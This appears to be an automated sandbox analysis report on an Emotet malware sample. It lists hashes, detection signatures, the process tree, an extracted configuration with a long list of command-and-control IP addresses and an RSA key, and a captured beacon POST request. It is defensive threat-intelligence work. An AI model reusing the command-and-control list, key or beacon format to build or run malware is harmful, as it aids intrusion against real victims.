Play interactive tour

Edit tour

Analysis Report 2ojdmC51As.exe

Overview

General Information

Sample Name:	2ojdmC51As.exe
Analysis ID:	319735
MD5:	5804d97670dcdfab88ba830682355dad
SHA1:	65c817fb511824fa185f34ecd744b836ed7a19eb
SHA256:	4e885ada930e285a005c5211b8a652dc0eb11a06ccf530561afa88aefe99c9fc
Most interesting Screenshot:

Detection

Emotet

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Emotet

Drops executables to the windows directory (C:\Windows) and starts them

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for sample

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files to the windows directory (C:\Windows)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains strange resources

Potential key logger detected (key state polling based)

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

2ojdmC51As.exe (PID: 6240 cmdline: 'C:\Users\user\Desktop\2ojdmC51As.exe' MD5: 5804D97670DCDFAB88BA830682355DAD)

sort.exe (PID: 4564 cmdline: C:\Windows\SysWOW64\setupugc\sort.exe MD5: 5804D97670DCDFAB88BA830682355DAD)

svchost.exe (PID: 6680 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6748 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7124 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["200.116.145.225:443", "96.126.101.6:8080", "5.196.108.185:8080", "167.114.153.111:8080", "194.187.133.160:443", "98.174.164.72:80", "103.86.49.11:8080", "78.24.219.147:8080", "50.245.107.73:443", "110.145.77.103:80", "94.200.114.161:80", "61.19.246.238:443", "194.4.58.192:7080", "209.54.13.14:80", "102.182.93.220:80", "186.70.56.94:443", "203.153.216.189:7080", "49.50.209.131:80", "176.113.52.6:443", "62.30.7.67:443", "61.76.222.210:80", "113.61.66.94:80", "157.245.99.39:8080", "216.139.123.119:80", "184.180.181.202:80", "123.142.37.166:80", "124.41.215.226:80", "119.59.116.21:8080", "41.185.28.84:8080", "5.39.91.110:7080", "220.245.198.194:80", "139.162.108.71:8080", "75.143.247.51:80", "74.214.230.200:80", "185.94.252.104:443", "208.180.207.205:80", "49.3.224.99:8080", "93.147.212.206:80", "182.208.30.18:443", "95.213.236.64:8080", "37.187.72.193:8080", "59.125.219.109:443", "37.179.204.33:80", "95.9.5.93:80", "168.235.67.138:7080", "118.83.154.64:443", "121.7.31.214:80", "74.208.45.104:8080", "87.106.136.232:8080", "138.68.87.218:443", "62.75.141.82:80", "66.76.12.94:8080", "202.134.4.216:8080", "47.36.140.164:80", "110.142.236.207:80", "134.209.144.106:443", "89.216.122.92:80", "75.188.96.231:80", "24.179.13.119:80", "218.147.193.146:80", "174.106.122.139:80", "71.15.245.148:8080", "104.131.11.150:443", "202.141.243.254:443", "94.230.70.6:80", "24.178.90.49:80", "97.82.79.83:80", "68.252.26.78:80", "173.63.222.65:80", "162.241.242.173:8080", "79.137.83.50:443", "80.241.255.202:8080", "120.150.60.189:80", "96.245.227.43:80", "50.91.114.38:80", "83.110.223.58:443", "24.230.141.169:80", "37.139.21.175:8080", "202.134.4.211:8080", "190.240.194.77:443", "176.111.60.55:8080", "123.176.25.234:80", "209.141.54.221:7080", "115.94.207.99:443", "50.35.17.13:80", "109.74.5.95:8080", "120.150.218.241:443", "121.124.124.40:7080", "217.20.166.178:7080", "108.46.29.236:80", "2.58.16.89:8080", "85.105.111.166:80", "137.59.187.107:8080", "139.162.60.124:8080", "76.175.162.101:80", "139.99.158.11:443", "104.131.123.136:443", "91.211.88.52:7080", "91.146.156.228:80", "172.104.97.173:8080", "89.121.205.18:80", "186.74.215.34:80", "61.33.119.226:443", "162.241.140.129:8080", "130.0.132.242:80", "190.108.228.27:443", "201.241.127.190:80", "87.106.139.101:8080", "78.188.106.53:443", "188.219.31.12:80", "76.171.227.238:80", "72.143.73.234:443", "62.171.142.179:8080", "139.59.60.244:8080", "24.137.76.62:80", "172.86.188.251:8080", "172.91.208.86:80", "94.23.237.171:443", "200.116.145.225:443", "96.126.101.6:8080", "5.196.108.185:8080", "167.114.153.111:8080", "194.187.133.160:443", "98.174.164.72:80", "103.86.49.11:8080", "78.24.219.147:8080", "50.245.107.73:443", "110.145.77.103:80", "94.200.114.161:80", "61.19.246.238:443", "194.4.58.192:7080", "209.54.13.14:80", "102.182.93.220:80", "186.70.56.94:443", "203.153.216.189:7080", "49.50.209.131:80", "176.113.52.6:443", "62.30.7.67:443", "61.76.222.210:80", "113.61.66.94:80", "157.245.99.39:8080", "216.139.123.119:80", "184.180.181.202:80", "123.142.37.166:80", "124.41.215.226:80", "119.59.116.21:8080", "41.185.28.84:8080", "5.39.91.110:7080", "220.245.198.194:80", "139.162.108.71:8080", "75.143.247.51:80", "74.214.230.200:80", "185.94.252.104:443", "208.180.207.205:80", "49.3.224.99:8080", "93.147.212.206:80", "182.208.30.18:443", "95.213.236.64:8080", "37.187.72.193:8080", "59.125.219.109:443", "37.179.204.33:80", "95.9.5.93:80", "168.235.67.138:7080", "118.83.154.64:443", "121.7.31.214:80", "74.208.45.104:8080", "87.106.136.232:8080", "138.68.87.218:443", "62.75.141.82:80", "66.76.12.94:8080", "202.134.4.216:8080", "47.36.140.164:80", "110.142.236.207:80", "134.209.144.106:443", "89.216.122.92:80", "75.188.96.231:80", "24.179.13.119:80", "218.147.193.146:80", "174.106.122.139:80", "71.15.245.148:8080", "104.131.11.150:443", "202.141.243.254:443", "94.230.70.6:80", "24.178.90.49:80", "97.82.79.83:80", "68.252.26.78:80", "173.63.222.65:80", "162.241.242.173:8080", "79.137.83.50:443", "80.241.255.202:8080", "120.150.60.189:80", "96.245.227.43:80", "50.91.114.38:80", "83.110.223.58:443", "24.230.141.169:80", "37.139.21.175:8080", "202.134.4.211:8080", "190.240.194.77:443", "176.111.60.55:8080", "123.176.25.234:80", "209.141.54.221:7080", "115.94.207.99:443", "50.35.17.13:80", "109.74.5.95:8080", "120.150.218.241:443", "121.124.124.40:7080", "217.20.166.178:7080", "108.46.29.236:80", "2.58.16.89:8080", "85.105.111.166:80", "137.59.187.107:8080", "139.162.60.124:8080", "76.175.162.101:80", "139.99.158.11:443", "104.131.123.136:443", "91.211.88.52:7080", "91.146.156.228:80", "172.104.97.173:8080", "89.121.205.18:80", "186.74.215.34:80", "61.33.119.226:443", "162.241.140.129:8080", "130.0.132.242:80", "190.108.228.27:443", "201.241.127.190:80", "87.106.139.101:8080", "78.188.106.53:443", "188.219.31.12:80", "76.171.227.238:80", "72.143.73.234:443", "62.171.142.179:8080", "139.59.60.244:8080", "24.137.76.62:80", "172.86.188.251:8080", "172.91.208.86:80", "94.23.237.171:443"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.667768852.0000000000664000.00000004.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000001.00000002.931663752.0000000002244000.00000004.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.667721626.0000000000620000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.2ojdmC51As.exe.2230000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.2.sort.exe.2270000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp	Malware Configuration Extractor: Emotet {"C2 list": ["200.116.145.225:443", "96.126.101.6:8080", "5.196.108.185:8080", "167.114.153.111:8080", "194.187.133.160:443", "98.174.164.72:80", "103.86.49.11:8080", "78.24.219.147:8080", "50.245.107.73:443", "110.145.77.103:80", "94.200.114.161:80", "61.19.246.238:443", "194.4.58.192:7080", "209.54.13.14:80", "102.182.93.220:80", "186.70.56.94:443", "203.153.216.189:7080", "49.50.209.131:80", "176.113.52.6:443", "62.30.7.67:443", "61.76.222.210:80", "113.61.66.94:80", "157.245.99.39:8080", "216.139.123.119:80", "184.180.181.202:80", "123.142.37.166:80", "124.41.215.226:80", "119.59.116.21:8080", "41.185.28.84:8080", "5.39.91.110:7080", "220.245.198.194:80", "139.162.108.71:8080", "75.143.247.51:80", "74.214.230.200:80", "185.94.252.104:443", "208.180.207.205:80", "49.3.224.99:8080", "93.147.212.206:80", "182.208.30.18:443", "95.213.236.64:8080", "37.187.72.193:8080", "59.125.219.109:443", "37.179.204.33:80", "95.9.5.93:80", "168.235.67.138:7080", "118.83.154.64:443", "121.7.31.214:80", "74.208.45.104:8080", "87.106.136.232:8080", "138.68.87.218:443", "62.75.141.82:80", "66.76.12.94:8080", "202.134.4.216:8080", "47.36.140.164:80", "110.142.236.207:80", "134.209.144.106:443", "89.216.122.92:80", "75.188.96.231:80", "24.179.13.119:80", "218.147.193.146:80", "174.106.122.139:80", "71.15.245.148:8080", "104.131.11.150:443", "202.141.243.254:443", "94.230.70.6:80", "24.178.90.49:80", "97.82.79.83:80", "68.252.26.78:80", "173.63.222.65:80", "162.241.242.173:8080", "79.137.83.50:443", "80.241.255.202:8080", "120.150.60.189:80", "96.245.227.43:80", "50.91.114.38:80", "83.110.223.58:443", "24.230.141.169:80", "37.139.21.175:8080", "202.134.4.211:8080", "190.240.194.77:443", "176.111.60.55:8080", "123.176.25.234:80", "209.141.54.221:7080", "115.94.207.99:443", "50.35.17.13:80", "109.74.5.95:8080", "120.150.218.241:443", "121.124.124.40:7080", "217.20.166.178:7080", "108.46.29.236:80", "2.58.16.89:8080", "85.105.111.166:80", "137.59.187.107:8080", "139.162.60.124:8080", "76.175.162.101:80", "139.99.158.11:443", "104.131.123.136:443", "91.211.88.52:7080", "91.146.156.228:80", "172.104.97.173:8080", "89.121.205.18:80", "186.74.215.34:80", "61.33.119.226:443", "162.241.140.129:8080", "130.0.132.242:80", "190.108.228.27:443", "201.241.127.190:80", "87.106.139.101:8080", "78.188.106.53:443", "188.219.31.12:80", "76.171.227.238:80", "72.143.73.234:443", "62.171.142.179:8080", "139.59.60.244:8080", "24.137.76.62:80", "172.86.188.251:8080", "172.91.208.86:80", "94.23.237.171:443", "200.116.145.225:443", "96.126.101.6:8080", "5.196.108.185:8080", "167.114.153.111:8080", "194.187.133.160:443", "98.174.164.72:80", "103.86.49.11:8080", "78.24.219.147:8080", "50.245.107.73:443", "110.145.77.103:80", "94.200.114.161:80", "61.19.246.238:443", "194.4.58.192:7080", "209.54.13.14:80", "102.182.93.220:80", "186.70.56.94:443", "203.153.216.189:7080", "49.50.209.131:80", "176.113.52.6:443", "62.30.7.67:443", "61.76.222.210:80", "113.61.66.94:80", "157.245.99.39:8080", "
Source: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp	Malware Configuration Extractor: Emotet {"C2 list": ["200.116.145.225:443", "96.126.101.6:8080", "5.196.108.185:8080", "167.114.153.111:8080", "194.187.133.160:443", "98.174.164.72:80", "103.86.49.11:8080", "78.24.219.147:8080", "50.245.107.73:443", "110.145.77.103:80", "94.200.114.161:80", "61.19.246.238:443", "194.4.58.192:7080", "209.54.13.14:80", "102.182.93.220:80", "186.70.56.94:443", "203.153.216.189:7080", "49.50.209.131:80", "176.113.52.6:443", "62.30.7.67:443", "61.76.222.210:80", "113.61.66.94:80", "157.245.99.39:8080", "216.139.123.119:80", "184.180.181.202:80", "123.142.37.166:80", "124.41.215.226:80", "119.59.116.21:8080", "41.185.28.84:8080", "5.39.91.110:7080", "220.245.198.194:80", "139.162.108.71:8080", "75.143.247.51:80", "74.214.230.200:80", "185.94.252.104:443", "208.180.207.205:80", "49.3.224.99:8080", "93.147.212.206:80", "182.208.30.18:443", "95.213.236.64:8080", "37.187.72.193:8080", "59.125.219.109:443", "37.179.204.33:80", "95.9.5.93:80", "168.235.67.138:7080", "118.83.154.64:443", "121.7.31.214:80", "74.208.45.104:8080", "87.106.136.232:8080", "138.68.87.218:443", "62.75.141.82:80", "66.76.12.94:8080", "202.134.4.216:8080", "47.36.140.164:80", "110.142.236.207:80", "134.209.144.106:443", "89.216.122.92:80", "75.188.96.231:80", "24.179.13.119:80", "218.147.193.146:80", "174.106.122.139:80", "71.15.245.148:8080", "104.131.11.150:443", "202.141.243.254:443", "94.230.70.6:80", "24.178.90.49:80", "97.82.79.83:80", "68.252.26.78:80", "173.63.222.65:80", "162.241.242.173:8080", "79.137.83.50:443", "80.241.255.202:8080", "120.150.60.189:80", "96.245.227.43:80", "50.91.114.38:80", "83.110.223.58:443", "24.230.141.169:80", "37.139.21.175:8080", "202.134.4.211:8080", "190.240.194.77:443", "176.111.60.55:8080", "123.176.25.234:80", "209.141.54.221:7080", "115.94.207.99:443", "50.35.17.13:80", "109.74.5.95:8080", "120.150.218.241:443", "121.124.124.40:7080", "217.20.166.178:7080", "108.46.29.236:80", "2.58.16.89:8080", "85.105.111.166:80", "137.59.187.107:8080", "139.162.60.124:8080", "76.175.162.101:80", "139.99.158.11:443", "104.131.123.136:443", "91.211.88.52:7080", "91.146.156.228:80", "172.104.97.173:8080", "89.121.205.18:80", "186.74.215.34:80", "61.33.119.226:443", "162.241.140.129:8080", "130.0.132.242:80", "190.108.228.27:443", "201.241.127.190:80", "87.106.139.101:8080", "78.188.106.53:443", "188.219.31.12:80", "76.171.227.238:80", "72.143.73.234:443", "62.171.142.179:8080", "139.59.60.244:8080", "24.137.76.62:80", "172.86.188.251:8080", "172.91.208.86:80", "94.23.237.171:443", "200.116.145.225:443", "96.126.101.6:8080", "5.196.108.185:8080", "167.114.153.111:8080", "194.187.133.160:443", "98.174.164.72:80", "103.86.49.11:8080", "78.24.219.147:8080", "50.245.107.73:443", "110.145.77.103:80", "94.200.114.161:80", "61.19.246.238:443", "194.4.58.192:7080", "209.54.13.14:80", "102.182.93.220:80", "186.70.56.94:443", "203.153.216.189:7080", "49.50.209.131:80", "176.113.52.6:443", "62.30.7.67:443", "61.76.222.210:80", "113.61.66.94:80", "157.245.99.39:8080", "

Machine Learning detection for sample

Show sources

Source: 2ojdmC51As.exe	Joe Sandbox ML: detected
Source: 2ojdmC51As.exe	Joe Sandbox ML: detected

Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02272650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,	1_2_02272650
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02272290 CryptGetHashParam,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,memcpy,CryptExportKey,GetProcessHeap,RtlAllocateHeap,	1_2_02272290
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02271FB0 memcpy,GetProcessHeap,RtlAllocateHeap,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt,CryptDuplicateHash,	1_2_02271FB0
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02272650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,	1_2_02272650
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02272290 CryptGetHashParam,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,memcpy,CryptExportKey,GetProcessHeap,RtlAllocateHeap,	1_2_02272290
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02271FB0 memcpy,GetProcessHeap,RtlAllocateHeap,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt,CryptDuplicateHash,	1_2_02271FB0

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004182CC FindFirstFileA,FindClose,	0_2_004182CC
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	0_2_00417B29
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_022338F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,	0_2_022338F0
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004182CC FindFirstFileA,FindClose,	0_2_004182CC
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	0_2_00417B29
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_022338F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,	0_2_022338F0
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_004182CC FindFirstFileA,FindClose,	1_2_004182CC
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	1_2_00417B29
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_022738F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,	1_2_022738F0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.4:49742 -> 200.116.145.225:443
Source: Traffic	Snort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.4:49742 -> 200.116.145.225:443

Source: Joe Sandbox View	ASN Name: EPMTelecomunicacionesSAESPCO EPMTelecomunicacionesSAESPCO
Source: Joe Sandbox View	ASN Name: EPMTelecomunicacionesSAESPCO EPMTelecomunicacionesSAESPCO

Source: global traffic	HTTP traffic detected: POST /0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 200.116.145.225/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------hcIbcONokUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 200.116.145.225:443Content-Length: 4628Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 200.116.145.225/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------hcIbcONokUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 200.116.145.225:443Content-Length: 4628Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown	TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown	TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown	TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown	TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown	TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown	TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown	TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown	TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown	TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown	TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: unknown	TCP traffic detected without corresponding DNS query: 200.116.145.225

Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_022729B0 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW,		1_2_022729B0
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_022729B0 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW,		1_2_022729B0

Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z\|\|.\|\|18ebec36-1675-40c0-a5d4-25e9e774360f\|\|1152921505692410033\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free 